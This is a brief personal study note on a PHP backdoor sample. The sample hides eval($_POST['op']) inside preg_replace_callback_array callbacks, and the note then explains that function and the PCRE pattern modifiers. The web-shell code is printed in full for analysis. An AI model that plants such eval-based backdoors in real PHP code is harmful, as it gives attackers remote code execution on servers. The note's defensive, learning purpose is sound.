中文摘要
每日记录。最近生病了,就一个样例
本文内容包含php木马分析,函数preg_replace_callback_array,php正则匹配模式学习
Sample1
<?php
$subject = 'little hann';
preg_replace_callback_array(
[
'~[t]+~i' => function ($match) {
eval($_POST['op']);
},
'~[n]+~i' => function ($match) {
eval($_POST['op']);
}
],
$subject
);
?>
Analysis
Function:preg_replace_callback_array
use a example to show it usage
<?php
$subject = 'Aaaaaa Bbb';
preg_replace_callback_array(
[
'~[a]+~i' => function ($match) {
echo strlen($match[0]), ' matches for "a" found', PHP_EOL;
},
'~[b]+~i' => function ($match) {
echo strlen($match[0]), ' matches for "b" found', PHP_EOL;
}
],
$subject
);
?>
THE OUTPUT IS
6 matches for "a" found
3 matches for "b" found
IN THE TROJAN
So,this function will regex match a string which include the char ‘n’ or ‘t’,And then attack post the command through parameter 'op'
to achieve RCE attack
Need to remember: PHP RCRE Pattern Modifiers
http://php.net/manual/en/reference.pcre.pattern.modifiers.php
- i: latters in the pattern mattch both upper and lower case
- m(MULTILINE): match every immediately following or immediately before any newline in the subject string
- s(DOTALL): a dot metacharacter in the pattern matches all characters, including newlines
- x(EXTENDED): whitespace data characters in the pattern are totally ignored except when escaped or inside a character class, and characters between an unescaped
- e(REPLACE_EVAL): does normal substitution of backreferences in the replacement string, evaluates it as PHP code, and uses the result for replacing the search string
Pleases pay attention to this one,is unsafe.This feature was DEPRECATED in PHP 5.5.0, and REMOVED as of PHP 7.0.0.
- A: it is constrained to match only at the start of the string which is being searched (the “subject string”)[i cant understand it,maybe i can understand it after experiment ]
- D(DOLLAR_ENDONLY): a dollar metacharacter in the pattern matches only at the end of the subject string
- S: perform extra analysis for a reuse pattern
- U(UNGREEDY): inverts the “greediness” of the quantifiers so that they are not greedy by default, but become greedy if followed by ?.
- X: Any backslash in a pattern that is followed by a letter that has no special meaning causes an error
- J: this setting will changes the local PCRE_DUPNAMES option to
Allow duplicate names for subpatterns.
- u(UFT8): Pattern and subject strings are treated as UTF-8
- frequently-used maybe:
i,m,s,x - dont use
e